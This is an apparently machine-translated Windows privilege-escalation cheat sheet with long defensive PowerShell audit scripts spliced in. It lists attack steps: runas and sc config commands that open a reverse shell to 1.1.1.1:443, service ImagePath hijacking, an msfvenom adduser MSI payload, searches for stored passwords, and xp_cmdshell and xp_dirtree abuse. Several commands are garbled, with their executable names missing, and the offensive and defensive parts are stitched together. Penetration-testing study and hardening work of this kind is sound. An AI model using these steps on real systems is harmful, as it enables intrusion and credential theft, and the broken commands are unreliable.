
Windows License Elevation Guide

Popularity: 756 / 2025-04-24 12:59:16



Navigation

  • One - Se Privileges
  • Two - RunAs
  • Three - Weak Services
  • Four - Windows Kernel
  • Five - Password Search
  • Six - Miscellaneous
    • AlwaysInstallElevated
    • Autostart
  • Seven - Service Programs
    • MSSQL
    • MySQL UDF
    • PrintNightmare
    • Unsafe GUI programs
  • Eight - Automation Tools


One - Se Privileges

  1. Check whether the current user holds any interesting Se privileges, such as SeImpersonatePrivilege/SeAssignPrimaryTokenPrivilege, SeBackupPrivilege, SeRestorePrivilege/SeTakeOwnershipPrivilege. 【Command: whoami /priv】
  2. With SeImpersonatePrivilege, the "Potato" family of exploits escalates privileges. 【Exploitation method】
  3. With SeBackupPrivilege, first extract the SAM/SYSTEM hives, then use a pass-the-hash (PTH) attack to escalate. 【Exploitation method】
  4. What the remaining privileges allow can be studied from the contents of the referenced repository.
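The whoami /priv check above only shows the current token. For a defender the more useful view is machine-wide: which principals are granted these rights at all. The script below is an added example, not part of the original guide; it exports the local user-rights assignment with secedit (an elevated prompt is required), keeps only the privileges named above and resolves the granted SIDs to account names. The temporary file name is an assumption.

```powershell
# Added example (not from the original guide): list who holds the high-impact
# user rights named above, machine-wide, via secedit's exported local policy.
# Run from an elevated prompt; secedit /export needs administrator rights.
$Watch = @(
    'SeImpersonatePrivilege',
    'SeAssignPrimaryTokenPrivilege',
    'SeBackupPrivilege',
    'SeRestorePrivilege',
    'SeTakeOwnershipPrivilege'
)

function Get-UserRightHolders {
    param([string[]]$Rights)
    $inf = Join-Path $env:TEMP 'user_rights_export.inf'   # assumed temp path
    # Export only the user-rights area; the output is a Unicode INI file.
    secedit.exe /export /cfg $inf /areas USER_RIGHTS | Out-Null
    $result = @()
    foreach ($line in Get-Content -Path $inf) {
        # Lines look like: SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
        if ($line -notmatch '^\s*(Se\w+)\s*=\s*(.*)$') { continue }
        $right = $Matches[1]
        if ($Rights -notcontains $right) { continue }
        foreach ($entry in ($Matches[2] -split ',')) {
            $id = $entry.Trim().TrimStart('*')
            if (-not $id) { continue }
            # Entries are SIDs prefixed with '*'; resolve them to names where possible.
            $name = $id
            if ($id -like 'S-1-*') {
                try {
                    $name = ([System.Security.Principal.SecurityIdentifier]$id).Translate(
                        [System.Security.Principal.NTAccount]).Value
                } catch { }
            }
            $result += [pscustomobject]@{ Right = $right; Sid = $id; Account = $name }
        }
    }
    Remove-Item -Path $inf -ErrorAction SilentlyContinue
    return $result
}

$holders = Get-UserRightHolders -Rights $Watch
$holders | Sort-Object Right, Account | Format-Table -AutoSize

# Review point: on a default workstation SeImpersonate is held by Administrators,
# SERVICE, LOCAL SERVICE and NETWORK SERVICE, SeAssignPrimaryToken by the two
# service accounts, SeBackup/SeRestore by Administrators and Backup Operators,
# SeTakeOwnership by Administrators. Any extra holder (a custom service account,
# an IIS application pool identity, a plain user) is what this audit is for.
```

Run it periodically or from a configuration-management job; a new holder of SeImpersonatePrivilege is exactly the precondition for the Potato exploits the text refers to, so it is worth alerting on rather than discovering during an incident.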

Two - RunAs

  1. Check whether the current environment has any stored credentials. 【Command: cmdkey /list】
  2. If credentials are found, runas /env /noprofile /savecred /user:admin "c:\temp\ 1.1.1.1 443 -e " can be used to move to that user's privileges.
  3. If the password search below yields user password information, refer to this article for moving privileges.

Three - Weak Services

  1. Weak-service enumeration is best left to tools such as PowerUp and winPEAS; manual analysis is cumbersome. The weak service categories are as follows:
  2. Weak service permissions: the user has modify rights on the service object itself, so the service's binary path or the identity it starts as can be changed with the sc command. 【Command: sc config Juggernaut binPath= "C:\temp\ 1.1.1.1 443 -e C:\windows\system32\"】【More details】
  3. Weak registry permissions: the user has write access to the service's registry key, so the reg command can be used to indirectly change the binary path or the start identity. 【Command: reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Juggernaut" /v ImagePath /t REG_EXPAND_SZ /d "C:\temp\" /f】【More details】
  4. Weak file/directory permissions: the user has write access to the directory holding the service binary, so the binary can be replaced. 【More details】
  5. Unquoted service path: (1) the absolute path of the service binary contains spaces and is not wrapped in double quotes, so the system searches for an executable segment by segment in path-priority order; (2) the user has write access to one of the directories along that search; (3) a malicious program with the corresponding name is written into that directory. 【More details】
  6. DLL hijacking: like replacing the service binary under "weak file/directory permissions", DLL hijacking directly replaces, or indirectly hijacks, a DLL loaded by the service binary.
    1. Direct replacement requires write access to the directory holding the service binary. [Note: if that is the case, why not just replace the binary itself?] 【More details】
    2. Indirect hijacking requires analysing which DLLs the service loads at start, and having write access to one of the DLL standard search directories. [Note: this is only practical for well-known, widely deployed services.] 【More details】
    3. Some repositories that attack system DLL loading:
      1. /xct/diaghub
      2. /itm4n/UsoDllLoader
      3. /sailay1996/WerTrigger

Note: Before exploiting a service, first confirm that you can trigger a restart of it (restart the service with sc start *, or reboot the machine); otherwise the modification is useless.
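Two of the categories above, unquoted paths and weak service permissions, can be audited with a short script rather than by hand. The following is an added example and not code from the original guide: it walks every installed service, flags binaries whose unquoted path contains a space, reads each service's security descriptor with sc.exe sdshow and reports any low-privileged principal that holds change-config or write-DACL/owner rights, then prints the sc.exe remediation. The SID list and access-mask constants are the standard Windows values; the service name Juggernaut from the text is not assumed.

```powershell
# Added example (not from the original guide): audit services for the
# "unquoted path" and "weak service permissions" misconfigurations and
# print the sc.exe remediation for each finding. Run from an elevated prompt.

# Low-privileged principals whose write-type rights on a service are a finding.
$LowPrivSids = @(
    'S-1-1-0',      # Everyone
    'S-1-5-11',     # Authenticated Users
    'S-1-5-32-545', # BUILTIN\Users
    'S-1-5-4'       # INTERACTIVE
)
# Service access-mask bits that allow reconfiguring or taking over the service:
# SERVICE_CHANGE_CONFIG, WRITE_DAC, WRITE_OWNER, GENERIC_ALL, GENERIC_WRITE.
$DangerousMask = 0x0002 -bor 0x40000 -bor 0x80000 -bor 0x10000000 -bor 0x40000000

function Test-UnquotedServicePath {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $false }
    if ($PathName.TrimStart().StartsWith('"')) { return $false }   # already quoted
    # Executable part is everything up to the first ".exe"; a space there is the bug.
    $exe = ($PathName -split '\.exe')[0]
    return ($exe -match '\s')
}

function Get-QuotedBinPathFix {
    # Build the cmd.exe-style sc command that quotes only the executable, keeping arguments.
    param([string]$ServiceName, [string]$PathName)
    $idx = $PathName.IndexOf('.exe', [System.StringComparison]::OrdinalIgnoreCase)
    if ($idx -ge 0) {
        $exePath = $PathName.Substring(0, $idx + 4); $rest = $PathName.Substring($idx + 4)
    } else {
        $exePath = $PathName; $rest = ''
    }
    return ('sc.exe config "{0}" binPath= "\"{1}\"{2}"' -f $ServiceName, $exePath, $rest)
}

function Get-WeakServiceDacl {
    param([string]$ServiceName)
    $sddl = (sc.exe sdshow "$ServiceName" | Where-Object { $_ -match '^D:' }) -join ''
    if (-not $sddl) { return @() }
    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($sddl)
    $weak = @()
    foreach ($ace in $sd.DiscretionaryAcl) {
        if ($ace.AceType -ne [System.Security.AccessControl.AceType]::AccessAllowed) { continue }
        if ($LowPrivSids -notcontains $ace.SecurityIdentifier.Value) { continue }
        if (($ace.AccessMask -band $DangerousMask) -ne 0) {
            $weak += [pscustomobject]@{
                Sid  = $ace.SecurityIdentifier.Value
                Mask = ('0x{0:X}' -f $ace.AccessMask)
            }
        }
    }
    return $weak
}

$findings = @()
foreach ($svc in Get-CimInstance -ClassName Win32_Service) {
    if (Test-UnquotedServicePath -PathName $svc.PathName) {
        $findings += [pscustomobject]@{
            Service = $svc.Name; Issue = 'Unquoted path'; Detail = $svc.PathName
            Fix     = Get-QuotedBinPathFix -ServiceName $svc.Name -PathName $svc.PathName
        }
    }
    foreach ($w in (Get-WeakServiceDacl -ServiceName $svc.Name)) {
        $findings += [pscustomobject]@{
            Service = $svc.Name; Issue = 'Weak service DACL'
            Detail  = ('{0} holds {1}' -f $w.Sid, $w.Mask)
            Fix     = 'Review with "sc.exe sdshow" and tighten with "sc.exe sdset", or reinstall the service with a correct DACL'
        }
    }
}
$findings | Format-Table -AutoSize -Wrap
```

The unquoted-path fix quotes only the executable and leaves any arguments outside the inner quotes, which is the form sc.exe expects; the weak-DACL check looks at allow ACEs only, since a deny ACE for Users is harmless. Pair this with the registry-key and directory ACL checks for the other two categories, which are ordinary Get-Acl work.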

Four - Windows Kernel

  1. Check the OS version information and determine whether it is an old or new Windows version. 【Command: systeminfo】

  2. Windows XP/7/Server 2008/Server 2012 and other older releases count as old versions. For old versions, hand the system information to the automated tools wesng and Windows Exploit Suggester 2 for offline analysis, or run the sherlock.ps1 script on the victim machine; vulnerabilities that appear in the intersection of the results can be tried first. 【More details】

  3. Windows 10/Server 2016/Server 2019 and other newer releases count as new versions. For new versions, use the automated tool winPEAS for local analysis on the victim, or search manually offline with Kali's built-in Searchsploit. 【More details】

  4. Recommended high-quality kernel exploits:

    1. PrintNightmare: almost all supported versions of Windows.
    2. cve_2022_21882_win32k 【also supported by MSF】: almost all versions of Win10.
    3. Other compiled kernel exploits

Note: Among the many Windows kernel exploits, some only work in a GUI session; pay special attention to this.

Five - Password Search

  1. Common paths for unattended-installation files:
    1. C:\
    2. C:\Windows\Panther\
    3. C:\Windows\Panther\Unattend\
    4. C:\Windows\system32\
    5. C:\Windows\system32\sysprep\
  2. Files of interest under the user directories. 【Command: dir /s /b c:\users\ | findstr .*\..*】
  3. PowerShell history files:
    1. type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
    2. cat (Get-PSReadlineOption).HistorySavePath
  4. IIS configuration and web files:
    1. Get-Childitem -Recurse C:\inetpub | findstr -i "directory config txt aspx ps1 bat xml pass user", then look through the results for configuration files or similar.
    2. Besides IIS's default C:\inetpub directory, these directories are also worth noting: C:\apache, C:\nginx, C:\xampp, C:\wamp.
  5. If you can log in to the SQL database, look through the system and user databases for account passwords in the user tables.

Six - Miscellaneous

1. AlwaysInstallElevated

  1. Check whether the AlwaysInstallElevated feature is enabled. 【A value of 1 means it is enabled】

    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

  2. Build the payload: msfvenom -p windows/adduser USER=msi PASS=pass@123 -f msi -o /root/
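The two reg query commands above have to be read together: the policy only takes effect when both the HKCU and the HKLM value are 1. The script below, an added example rather than code from the original guide, evaluates that condition and, with -Remediate, sets both values back to 0 (the secure default). Running it with -Remediate requires an elevated prompt for the HKLM change.

```powershell
# Added example (not from the original guide): report the AlwaysInstallElevated
# state of both hives and optionally set it back to 0.
param([switch]$Remediate)

$Keys = @(
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    $state = @()
    foreach ($k in $Keys) {
        $value = $null
        if (Test-Path $k) {
            $value = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        $state += [pscustomobject]@{ Key = $k; Value = $value; Enabled = ($value -eq 1) }
    }
    return $state
}

$state = Get-AlwaysInstallElevatedState
$state | Format-Table -AutoSize

# The policy is live only when BOTH values are 1; that is the condition worth alerting on.
$exposed = ($state | Where-Object { -not $_.Enabled }).Count -eq 0
if ($exposed) {
    Write-Warning 'AlwaysInstallElevated is enabled in HKCU and HKLM: any MSI this user installs runs as SYSTEM.'
    if ($Remediate) {
        foreach ($k in $Keys) {
            Set-ItemProperty -Path $k -Name AlwaysInstallElevated -Value 0 -Type DWord
        }
        Write-Host 'Set AlwaysInstallElevated=0 in both hives.'
    }
} else {
    Write-Host 'AlwaysInstallElevated is not effective on this host.'
}
```

Because the value is a Group Policy setting, a local fix is overwritten at the next policy refresh if a domain GPO still sets it; the durable remediation is removing the setting from the GPO (Computer and User Configuration > Administrative Templates > Windows Components > Windows Installer).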

2. Autostart

  1. Autostart folder: icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" 【With write permission, simply drop a program or .bat file into it.】
  2. Autostart registry: reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" 【(1) With write permission on the key, a new value can be created under it; (2) inspect the program paths in the existing values for weak directory permissions or unquoted path problems.】

Note: The other keys beside Run at the same registry path (RunOnce, RunOnceEx and the like) are also worth attention. A program in the RunOnce key is removed from the key after it has run once.
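The icacls and reg query commands above give raw output that still has to be interpreted. The script below is an added example, not part of the original guide; it applies the three checks the text describes in one pass: write access by low-privileged principals on the Startup folder, on the Run/RunOnce keys, and on the directory of every program those keys launch, plus unquoted program paths. The list of principals treated as low-privileged is an assumption you may extend.

```powershell
# Added example (not from the original guide): audit the autostart locations
# named above for write access by low-privileged principals.

$LowPriv = @('Everyone', 'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')
$FsWrite  = [System.Security.AccessControl.FileSystemRights]'Write, Delete, ChangePermissions, TakeOwnership'
$RegWrite = [System.Security.AccessControl.RegistryRights]'SetValue, CreateSubKey, ChangePermissions, TakeOwnership'
$PsNoise  = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

function Get-LowPrivWriters {
    # Low-privileged identities that can write to a file-system path (empty if none).
    param([string]$Path)
    if ([string]::IsNullOrEmpty($Path) -or -not (Test-Path -LiteralPath $Path)) { return @() }
    $hits = @()
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.FileSystemRights -band $FsWrite) -ne 0) { $hits += $ace.IdentityReference.Value }
    }
    return ($hits | Select-Object -Unique)
}

function Get-LowPrivRegistryWriters {
    param([string]$KeyPath)
    if (-not (Test-Path $KeyPath)) { return @() }
    $hits = @()
    foreach ($ace in (Get-Acl -Path $KeyPath).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($LowPriv -notcontains $ace.IdentityReference.Value) { continue }
        if (($ace.RegistryRights -band $RegWrite) -ne 0) { $hits += $ace.IdentityReference.Value }
    }
    return ($hits | Select-Object -Unique)
}

function Get-ProgramPathFromCommand {
    # Extract the executable from a Run-value command line, quoted or not.
    param([string]$Command)
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($Command -match '^\s*([^"]*?\.exe)') { return $Matches[1] }   # unquoted, may contain spaces
    return ($Command -split '\s')[0]
}

$findings = @()
$startup = 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup'
foreach ($who in (Get-LowPrivWriters -Path $startup)) {
    $findings += [pscustomobject]@{ Location = $startup; Writable = $who; Via = 'Startup folder ACL' }
}

$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)
foreach ($key in $runKeys) {
    foreach ($who in (Get-LowPrivRegistryWriters -KeyPath $key)) {
        $findings += [pscustomobject]@{ Location = $key; Writable = $who; Via = 'Registry key ACL' }
    }
    if (-not (Test-Path $key)) { continue }
    foreach ($p in (Get-ItemProperty -Path $key).PSObject.Properties) {
        if ($PsNoise -contains $p.Name) { continue }
        $cmdLine = [string]$p.Value
        $exe = [System.Environment]::ExpandEnvironmentVariables((Get-ProgramPathFromCommand -Command $cmdLine))
        if (-not $exe) { continue }
        foreach ($who in (Get-LowPrivWriters -Path (Split-Path -Path $exe -Parent))) {
            $findings += [pscustomobject]@{ Location = $exe; Writable = $who; Via = ('Program directory of Run value "{0}"' -f $p.Name) }
        }
        if (($cmdLine -notmatch '^\s*"') -and ($exe -match '\s')) {
            $findings += [pscustomobject]@{ Location = $exe; Writable = '-'; Via = ('Unquoted path in Run value "{0}"' -f $p.Name) }
        }
    }
}
$findings | Format-Table -AutoSize -Wrap
```

A finding on the program directory means an ordinary user could swap the binary that every interactive logon (including an administrator's) launches, which is the "weak directory permission" case the text points at; the fix is an icacls grant reset on that directory rather than on the Run key.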

Seven - Service Programs

Before anything else, use the command netstat -anop tcp | findstr LISTENING to determine which services running on this system may be of interest.

1. MSSQL

  1. Scenario 1: (1) you have a database login that can execute the xp_dirtree command; (2) use it to make the MSSQL service account authenticate to a listener, capture its NetNTLMv2 hash and crack it. 【Exploitation method】
  2. Scenario 2: (1) you have the database administrator account sa; (2) obtain a reverse shell with the service account's privileges through the xp_cmdshell command. 【Exploitation method】
  3. Note: (1) Any MSSQL database account obtained is worth testing for permission to execute xp_dirtree and xp_cmdshell, because tangled permission assignments occur from time to time. (2) Any service account may hold more Se privileges than an ordinary account, giving more breakthrough points, so any service account may yield unexpected surprises.
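Both MSSQL scenarios hinge on two things an administrator can audit directly: whether xp_cmdshell is switched on, and which principals hold EXECUTE on xp_dirtree and xp_cmdshell (plus who is sysadmin, since sysadmin bypasses those grants). The script below is an added example, not code from the original guide; it connects with the current Windows identity through System.Data.SqlClient and runs three catalog queries. The instance name is an assumption.

```powershell
# Added example (not from the original guide): audit an instance for the
# xp_cmdshell / xp_dirtree exposures described above. Needs a Windows login
# with VIEW DEFINITION or sysadmin on the instance; $Instance is an assumption.
param([string]$Instance = 'localhost')

function Invoke-AuditQuery {
    param([System.Data.SqlClient.SqlConnection]$Connection, [string]$Sql)
    $cmd = $Connection.CreateCommand()
    $cmd.CommandText = $Sql
    $table = New-Object System.Data.DataTable
    $adapter = New-Object System.Data.SqlClient.SqlDataAdapter($cmd)
    [void]$adapter.Fill($table)
    return $table
}

$ConfigSql = @"
SELECT name, CAST(value_in_use AS int) AS value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');
"@
# Explicit EXECUTE grants on the two extended procedures live in master.
$GrantSql = @"
SELECT o.name AS proc_name, pr.name AS grantee, pe.state_desc
FROM master.sys.database_permissions pe
JOIN master.sys.database_principals pr ON pr.principal_id = pe.grantee_principal_id
JOIN master.sys.all_objects o ON o.object_id = pe.major_id
WHERE pe.class = 1
  AND o.name IN ('xp_dirtree', 'xp_cmdshell')
  AND pe.permission_name = 'EXECUTE';
"@
$SysadminSql = "SELECT name FROM sys.server_principals WHERE IS_SRVROLEMEMBER('sysadmin', name) = 1;"

$conn = New-Object System.Data.SqlClient.SqlConnection(
    "Server=$Instance;Database=master;Integrated Security=True;Encrypt=True;TrustServerCertificate=True")
$conn.Open()
try {
    $cfg = Invoke-AuditQuery -Connection $conn -Sql $ConfigSql
    $cfg | Format-Table -AutoSize
    if (($cfg | Where-Object { $_.name -eq 'xp_cmdshell' }).value_in_use -eq 1) {
        Write-Warning 'xp_cmdshell is enabled. Disable with: EXEC sp_configure ''xp_cmdshell'', 0; RECONFIGURE;'
    }

    Write-Host 'Explicit EXECUTE grants on xp_dirtree / xp_cmdshell:'
    Invoke-AuditQuery -Connection $conn -Sql $GrantSql | Format-Table -AutoSize

    Write-Host 'Logins holding sysadmin (these bypass the grants above):'
    Invoke-AuditQuery -Connection $conn -Sql $SysadminSql | Format-Table -AutoSize
} finally {
    $conn.Close()
}
```

The second point in the text's note, that the service account may carry extra Se privileges, is best addressed at install time: run the engine under a virtual account or a gMSA rather than a local administrator, so that even a working xp_cmdshell lands in a low-privileged context.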

2. MySQL UDF

  1. Conditions: (1) the mysqld process runs as an administrator or SYSTEM; (2) a high-privilege database login such as root; (3) the MySQL version meets the exploit's requirement. 【Command: mysql -V】
  2. Exploitation method: Reference link 1, Reference link 2
  3. Obtaining it: command `searchsploit mysql udf`, id 1518.

3. PrintNightmare

  1. Scenario 1, RCE: (1) you have a standard user's credentials; (2) remote enumeration shows the Print Spooler service running. 【Command: @1.1.1.1 | egrep 'MS-RPRN|MS-PAR'】【Exploitation method】
  2. Scenario 2, LPE: locally check that the Print Spooler service is running. 【Command: sc query Spooler】【Exploitation method】
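The sc query Spooler check above is the attacker's precondition; the defender's version of the same check also looks at how the Spooler is allowed to install drivers. The script below is an added example, not code from the original guide: it reports the Spooler state and start mode together with the Point and Print policy values that Microsoft's PrintNightmare guidance covers, and prints the two hardening options. Treating an absent RestrictDriverInstallationToAdministrators value as the secure default is an assumption that holds for hosts carrying the August 2021 or later cumulative updates.

```powershell
# Added example (not from the original guide): report whether this host is exposed
# to PrintNightmare-style driver installation and how to harden it.

function Get-SpoolerExposure {
    $svc = Get-CimInstance -ClassName Win32_Service -Filter "Name='Spooler'"
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $pnp = if (Test-Path $key) { Get-ItemProperty -Path $key } else { $null }

    # Assumption: on a patched host an absent value means the secure default (1).
    $restrict = 1
    if ($pnp -and $null -ne $pnp.RestrictDriverInstallationToAdministrators) {
        $restrict = [int]$pnp.RestrictDriverInstallationToAdministrators
    }
    # Both overrides weaken Point and Print; 0 or absent is the hardened state.
    $noWarn = 0; $update = 0
    if ($pnp) {
        $noWarn = [int]$pnp.NoWarningNoElevationOnInstall
        $update = [int]$pnp.UpdatePromptSettings
    }

    $state = 'Not installed'; $startMode = '-'
    if ($svc) { $state = $svc.State; $startMode = $svc.StartMode }
    $weakPolicy = ($restrict -ne 1) -or ($noWarn -ne 0) -or ($update -ne 0)

    [pscustomobject]@{
        SpoolerState                               = $state
        SpoolerStartMode                           = $startMode
        RestrictDriverInstallationToAdministrators = $restrict
        NoWarningNoElevationOnInstall              = $noWarn
        UpdatePromptSettings                       = $update
        Exposed                                    = (($state -eq 'Running') -and $weakPolicy)
    }
}

$r = Get-SpoolerExposure
$r | Format-List
if ($r.Exposed) {
    Write-Warning 'Spooler is running with weakened Point and Print settings.'
    Write-Host 'Option 1 - no printing needed on this host: stop and disable the service'
    Write-Host '  Stop-Service Spooler; Set-Service Spooler -StartupType Disabled'
    Write-Host 'Option 2 - keep printing, but restrict driver installation to administrators'
    Write-Host '  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint" /v RestrictDriverInstallationToAdministrators /t REG_DWORD /d 1 /f'
} elseif ($r.SpoolerState -eq 'Running') {
    Write-Host 'Spooler is running with hardened Point and Print settings; keep the host patched.'
}
```

On domain controllers and servers that never print, option 1 is the usual choice; on print servers and workstations, option 2 plus the monthly update is the supported configuration.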

4. Unsafe GUI Programs

  1. Conditions: (1) a GUI interactive session has been obtained; (2) look for programs that run auto-elevated by default.
  2. Recommended programs worth trying:
    1. Control Panel - Troubleshooting - Help and Support - Open a Command Prompt window. 【Win7 and earlier have this function; Win10 removed it.】

Note: These programs may not succeed in escalating privileges, but they have another use: bypassing UAC. Although of limited value, the technique is worth keeping in mind.

Eight - Automation Tools

  1. PEASS-ng
  2. PowerUp
  3. Seatbelt
  4. PrivescCheck